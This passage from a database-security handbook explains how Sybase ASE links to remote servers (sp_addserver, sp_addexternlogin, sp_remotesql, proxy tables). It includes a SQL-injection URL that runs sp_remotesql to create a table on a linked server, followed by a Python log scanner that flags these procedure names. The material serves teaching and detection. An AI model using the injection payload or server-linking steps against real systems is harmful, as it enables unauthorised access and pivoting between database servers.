Connecting to Other Servers with Sybase

The legitimate method using sp_addserver is probably the easiest to use. To set up a connection to a remote Sybase ASE server with a specified username and password, execute the following:

 sp_addserver 'TEST', null, '192.168.1.12:5000' 

The server TEST has now been set up with the physical address being the IPv4 address 192.168.1.12, TCP port 5000.

You can then specify credentials for the remote server, specifying which local account maps to which credential set on the remote host:

 sp_addexternlogin 'TEST', 'sa', 'sa', 'password' 

Assuming you are logged in as sa to the local Sybase server, you can now test the connection to the remote host. If you have a direct connection to the local server, you can simply execute the statement

 connect to TEST 

to enter pass-through mode, which forwards all queries to TEST. You should be able to select @@version to determine the version of the remote host. To exit pass-through mode, type disconnect.

If you do not have a reliable direct connection to the local server (for example, you are working via SQL injection), you can use the sp_remotesql stored procedure to execute SQL on the newly added server:

 sp_remotesql 'TEST', 'select 123' 

You can use this syntax to create procedures and tables on the remote server.

In SQL injection terms, the web request to make a call to sp_remotesql would look like this:

 http://sybase.example.com/servlet/BookQuery?search=')+exec+sp_remotesql+'TEST','create+table+doodah(a+int)'-- 

Other ways of connecting to remote servers include adding a reference to a remote table or procedure that you know exists, for example the master..sysservers table:

 create existing table foo(
     srvid smallint,
     srvstatus smallint,
     srvname varchar(30),
     srvnetname varchar(32),
     srvclass smallint NULL,
     srvsecmech varchar(30) NULL,
     srvcost smallint NULL )
 external table at "TEST.master..sysservers"

You can then select from this table as though it were on the local server.

You can connect to other DBMSs by changing the second parameter to sp_addserver:

 sp_addserver 'TEST', 'sql_server' 
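
The procedures and statements above leave recognizable traces in web server logs when they arrive through an injectable parameter. The following Python sketch is an added example, not code from the book: it scans access-log lines for those names after undoing URL encoding. The log layout, the sample lines and the helper names normalize and scan_access_log are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Procedures and statements named in this section. "connect to" is left out
# because it matches ordinary search text too often to be a useful signal.
PATTERNS = {
    "sp_addserver": re.compile(r"\bsp_addserver\b"),
    "sp_addexternlogin": re.compile(r"\bsp_addexternlogin\b"),
    "sp_remotesql": re.compile(r"\bsp_remotesql\b"),
    "create existing table": re.compile(r"\bcreate\s+existing\s+table\b"),
}
# Assumed log layout: common/combined format, client address first.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(url, rounds=3):
    """Decode the query string until stable, drop SQL comments, fold case and spaces."""
    query = urlsplit(url).query
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def scan_access_log(lines):
    """Return (line_number, client, matched_names) for each flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the assumed format
        query = normalize(match.group(1))
        hits = [name for name, rx in PATTERNS.items() if rx.search(query)]
        if hits:
            findings.append((lineno, line.split()[0], hits))
    return findings

# Constructed sample log; line 2 is the request shown in this section.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /servlet/BookQuery?search=sybase+administration HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /servlet/BookQuery?search=')+exec+sp_remotesql+'TEST','create+table+doodah(a+int)'-- HTTP/1.1" 200 87
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /servlet/BookQuery?search=%27)%20EXEC%20Sp_AddServer%20%27TEST%27-- HTTP/1.1" 500 0
""".splitlines()

if __name__ == "__main__":
    for lineno, client, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {client} -> {', '.join(hits)}")
```

A hit is worth correlating with unexpected rows in master..sysservers on the database host, since that is where a newly added server definition appears.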


Database Hacker's Handbook. Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156
